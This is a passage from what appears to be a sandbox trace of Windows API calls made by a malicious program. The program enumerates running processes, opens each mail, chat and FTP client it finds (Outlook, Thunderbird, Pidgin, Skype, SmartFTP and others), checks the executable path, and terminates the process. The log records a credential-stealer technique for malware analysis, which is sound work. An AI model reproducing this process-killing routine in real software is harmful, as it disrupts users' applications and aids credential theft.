cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0060.078] GetCurrentProcessId () returned 0xf00 [0060.078] GetCurrentProcess () returned 0xffffffff [0060.078] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.078] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5f0) returned 0x3fc [0060.152] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Reference Assemblies\\operamail.exe" (normalized: "c:\\program files\\reference assemblies\\operamail.exe")) returned 0x33 [0060.152] StrStrIW (lpFirst="C:\\Program Files\\Reference Assemblies\\operamail.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.152] StrStrIW (lpFirst="C:\\Program Files\\Reference Assemblies\\operamail.exe", lpSrch="powershell.exe") returned 0x0 [0060.152] StrStrIW (lpFirst="C:\\Program Files\\Reference Assemblies\\operamail.exe", lpSrch="powershell.exe") returned 0x0 [0060.152] StrStrIW (lpFirst="C:\\Program Files\\Reference Assemblies\\operamail.exe", lpSrch="powershell.exe") returned 0x0 [0060.152] StrStrIW (lpFirst="C:\\Program Files\\Reference Assemblies\\operamail.exe", lpSrch="powershell.exe") returned 0x0 [0060.152] StrStrIW (lpFirst="C:\\Program Files\\Reference Assemblies\\operamail.exe", lpSrch="powershell.exe") returned 0x0 [0060.152] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.152] GetTickCount () returned 0x1150849 [0060.152] GetCurrentProcessId () returned 0xf00 [0060.152] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x5f0) returned 0x404 [0060.152] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.153] TerminateProcess (hProcess=0x404, uExitCode=0x1150849) returned 1 [0060.154] CloseHandle (hObject=0x404) returned 1 [0060.154] CloseHandle (hObject=0x3fc) returned 1 [0060.154] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0060.155] GetCurrentProcessId () returned 0xf00 [0060.155] GetCurrentProcess () returned 0xffffffff [0060.155] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.155] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x728) returned 0x3fc [0060.155] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows NT\\outlook.exe" (normalized: "c:\\program files (x86)\\windows nt\\outlook.exe")) returned 0x2d [0060.155] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows NT\\outlook.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.155] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows NT\\outlook.exe", lpSrch="powershell.exe") returned 0x0 [0060.155] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows NT\\outlook.exe", lpSrch="powershell.exe") returned 0x0 [0060.155] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows NT\\outlook.exe", lpSrch="powershell.exe") returned 0x0 [0060.156] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows NT\\outlook.exe", lpSrch="powershell.exe") returned 0x0 [0060.156] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows NT\\outlook.exe", lpSrch="powershell.exe") returned 0x0 [0060.156] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.156] GetTickCount () returned 0x1150849 [0060.156] GetCurrentProcessId () returned 0xf00 [0060.156] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x728) returned 0x404 [0060.156] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.156] TerminateProcess (hProcess=0x404, uExitCode=0x1150849) returned 1 [0060.157] CloseHandle (hObject=0x404) returned 1 [0060.157] CloseHandle (hObject=0x3fc) returned 1 [0060.157] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0060.158] GetCurrentProcessId () returned 0xf00 [0060.158] GetCurrentProcess () returned 0xffffffff [0060.158] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.158] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x824) returned 0x3fc [0060.158] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Security\\pidgin.exe" (normalized: "c:\\program files\\windows security\\pidgin.exe")) returned 0x2c [0060.159] StrStrIW (lpFirst="C:\\Program Files\\Windows Security\\pidgin.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.159] StrStrIW (lpFirst="C:\\Program Files\\Windows Security\\pidgin.exe", lpSrch="powershell.exe") returned 0x0 [0060.159] StrStrIW (lpFirst="C:\\Program Files\\Windows Security\\pidgin.exe", lpSrch="powershell.exe") returned 0x0 [0060.159] StrStrIW (lpFirst="C:\\Program Files\\Windows Security\\pidgin.exe", lpSrch="powershell.exe") returned 0x0 [0060.159] StrStrIW (lpFirst="C:\\Program Files\\Windows Security\\pidgin.exe", lpSrch="powershell.exe") returned 0x0 [0060.159] StrStrIW (lpFirst="C:\\Program Files\\Windows Security\\pidgin.exe", lpSrch="powershell.exe") returned 0x0 [0060.159] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.159] GetTickCount () returned 0x1150859 [0060.159] GetCurrentProcessId () returned 0xf00 [0060.159] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x824) returned 0x404 [0060.159] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.159] TerminateProcess (hProcess=0x404, uExitCode=0x1150859) returned 1 [0060.160] CloseHandle (hObject=0x404) returned 1 [0060.160] CloseHandle (hObject=0x3fc) returned 1 [0060.160] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0060.161] GetCurrentProcessId () returned 0xf00 [0060.161] GetCurrentProcess () returned 0xffffffff [0060.161] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.161] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xe84) returned 0x3fc [0060.161] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows NT\\scriptftp.exe" (normalized: "c:\\program files\\windows nt\\scriptftp.exe")) returned 0x29 [0060.161] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\scriptftp.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.161] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\scriptftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.161] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\scriptftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.161] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\scriptftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.161] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\scriptftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.161] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\scriptftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.161] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.162] GetTickCount () returned 0x1150859 [0060.162] GetCurrentProcessId () returned 0xf00 [0060.162] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xe84) returned 0x404 [0060.162] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.162] TerminateProcess (hProcess=0x404, uExitCode=0x1150859) returned 1 [0060.163] CloseHandle (hObject=0x404) returned 1 [0060.163] CloseHandle (hObject=0x3fc) returned 1 [0060.163] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0060.163] GetCurrentProcessId () returned 0xf00 [0060.164] GetCurrentProcess () returned 0xffffffff [0060.164] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.164] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xe90) returned 0x3fc [0060.164] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows NT\\skype.exe" (normalized: "c:\\program files\\windows nt\\skype.exe")) returned 0x25 [0060.164] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\skype.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.164] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\skype.exe", lpSrch="powershell.exe") returned 0x0 [0060.164] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\skype.exe", lpSrch="powershell.exe") returned 0x0 [0060.164] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\skype.exe", lpSrch="powershell.exe") returned 0x0 [0060.164] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\skype.exe", lpSrch="powershell.exe") returned 0x0 [0060.164] StrStrIW (lpFirst="C:\\Program Files\\Windows NT\\skype.exe", lpSrch="powershell.exe") returned 0x0 [0060.164] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.164] GetTickCount () returned 0x1150859 [0060.164] GetCurrentProcessId () returned 0xf00 [0060.164] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xe90) returned 0x404 [0060.164] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.164] TerminateProcess (hProcess=0x404, uExitCode=0x1150859) returned 1 [0060.165] CloseHandle (hObject=0x404) returned 1 [0060.165] CloseHandle (hObject=0x3fc) returned 1 [0060.165] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0060.166] GetCurrentProcessId () returned 0xf00 [0060.166] GetCurrentProcess () returned 0xffffffff [0060.166] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.166] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xe94) returned 0x3fc [0060.166] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\WindowsPowerShell\\smartftp.exe" (normalized: "c:\\program files\\windowspowershell\\smartftp.exe")) returned 0x2f [0060.167] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\smartftp.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.167] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\smartftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.167] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\smartftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.167] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\smartftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.167] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\smartftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.167] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\smartftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.167] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.167] GetTickCount () returned 0x1150859 [0060.167] GetCurrentProcessId () returned 0xf00 [0060.167] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xe94) returned 0x404 [0060.167] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.167] TerminateProcess (hProcess=0x404, uExitCode=0x1150859) returned 1 [0060.168] CloseHandle (hObject=0x404) returned 1 [0060.168] CloseHandle (hObject=0x3fc) returned 1 [0060.168] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0060.169] GetCurrentProcessId () returned 0xf00 [0060.169] GetCurrentProcess () returned 0xffffffff [0060.169] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.169] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xebc) returned 0x3fc [0060.169] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Maintenance Service\\thunderbird.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\thunderbird.exe")) returned 0x42 [0060.169] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\thunderbird.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.169] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\thunderbird.exe", lpSrch="powershell.exe") returned 0x0 [0060.170] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\thunderbird.exe", lpSrch="powershell.exe") returned 0x0 [0060.170] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\thunderbird.exe", lpSrch="powershell.exe") returned 0x0 [0060.170] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\thunderbird.exe", lpSrch="powershell.exe") returned 0x0 [0060.170] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\thunderbird.exe", lpSrch="powershell.exe") returned 0x0 [0060.170] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.170] GetTickCount () returned 0x1150859 [0060.170] GetCurrentProcessId () returned 0xf00 [0060.170] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xebc) returned 0x404 [0060.170] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.170] TerminateProcess (hProcess=0x404, uExitCode=0x1150859) returned 1 [0060.171] CloseHandle (hObject=0x404) returned 1 [0060.171] CloseHandle (hObject=0x3fc) returned 1 [0060.171] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0060.172] GetCurrentProcessId () returned 0xf00 [0060.172] GetCurrentProcess () returned 0xffffffff [0060.172] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.172] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xeb0) returned 0x3fc [0060.172] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office 15\\totalcmd.exe" (normalized: "c:\\program files\\microsoft office 15\\totalcmd.exe")) returned 0x31 [0060.172] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office 15\\totalcmd.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.172] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office 15\\totalcmd.exe", lpSrch="powershell.exe") returned 0x0 [0060.172] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office 15\\totalcmd.exe", lpSrch="powershell.exe") returned 0x0 [0060.172] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office 15\\totalcmd.exe", lpSrch="powershell.exe") returned 0x0 [0060.172] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office 15\\totalcmd.exe", lpSrch="powershell.exe") returned 0x0 [0060.172] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office 15\\totalcmd.exe", lpSrch="powershell.exe") returned 0x0 [0060.173] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.173] GetTickCount () returned 0x1150869 [0060.173] GetCurrentProcessId () returned 0xf00 [0060.173] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xeb0) returned 0x404 [0060.173] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.173] TerminateProcess (hProcess=0x404, uExitCode=0x1150869) returned 1 [0060.174] CloseHandle (hObject=0x404) returned 1 [0060.174] CloseHandle (hObject=0x3fc) returned 1 [0060.174] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0060.175] GetCurrentProcessId () returned 0xf00 [0060.175] GetCurrentProcess () returned 0xffffffff [0060.175] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.175] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xec4) returned 0x3fc [0060.175] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\trillian.exe" (normalized: "c:\\program files (x86)\\internet explorer\\trillian.exe")) returned 0x35 [0060.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Internet Explorer\\trillian.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Internet Explorer\\trillian.exe", lpSrch="powershell.exe") returned 0x0 [0060.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Internet Explorer\\trillian.exe", lpSrch="powershell.exe") returned 0x0 [0060.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Internet Explorer\\trillian.exe", lpSrch="powershell.exe") returned 0x0 [0060.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Internet Explorer\\trillian.exe", lpSrch="powershell.exe") returned 0x0 [0060.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Internet Explorer\\trillian.exe", lpSrch="powershell.exe") returned 0x0 [0060.175] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.175] GetTickCount () returned 0x1150869 [0060.175] GetCurrentProcessId () returned 0xf00 [0060.175] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xec4) returned 0x404 [0060.175] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.175] TerminateProcess (hProcess=0x404, uExitCode=0x1150869) returned 1 [0060.176] CloseHandle (hObject=0x404) returned 1 [0060.176] CloseHandle (hObject=0x3fc) returned 1 [0060.176] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0060.177] GetCurrentProcessId () returned 0xf00 [0060.177] GetCurrentProcess () returned 0xffffffff [0060.177] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.177] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xf4) returned 0x3fc [0060.177] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office\\webdrive.exe" (normalized: "c:\\program files\\microsoft office\\webdrive.exe")) returned 0x2e [0060.178] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\webdrive.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.178] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\webdrive.exe", lpSrch="powershell.exe") returned 0x0 [0060.178] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\webdrive.exe", lpSrch="powershell.exe") returned 0x0 [0060.178] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\webdrive.exe", lpSrch="powershell.exe") returned 0x0 [0060.178] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\webdrive.exe", lpSrch="powershell.exe") returned 0x0 [0060.178] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\webdrive.exe", lpSrch="powershell.exe") returned 0x0 [0060.178] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.178] GetTickCount () returned 0x1150869 [0060.178] GetCurrentProcessId () returned 0xf00 [0060.178] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xf4) returned 0x404 [0060.178] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.178] TerminateProcess (hProcess=0x404, uExitCode=0x1150869) returned 1 [0060.179] CloseHandle (hObject=0x404) returned 1 [0060.179] CloseHandle (hObject=0x3fc) returned 1 [0060.179] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0060.180] GetCurrentProcessId () returned 0xf00 [0060.180] GetCurrentProcess () returned 0xffffffff [0060.180] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.180] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xf3c) returned 0x3fc [0060.180] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Google\\whatsapp.exe" (normalized: "c:\\program files (x86)\\google\\whatsapp.exe")) returned 0x2a [0060.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Google\\whatsapp.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Google\\whatsapp.exe", 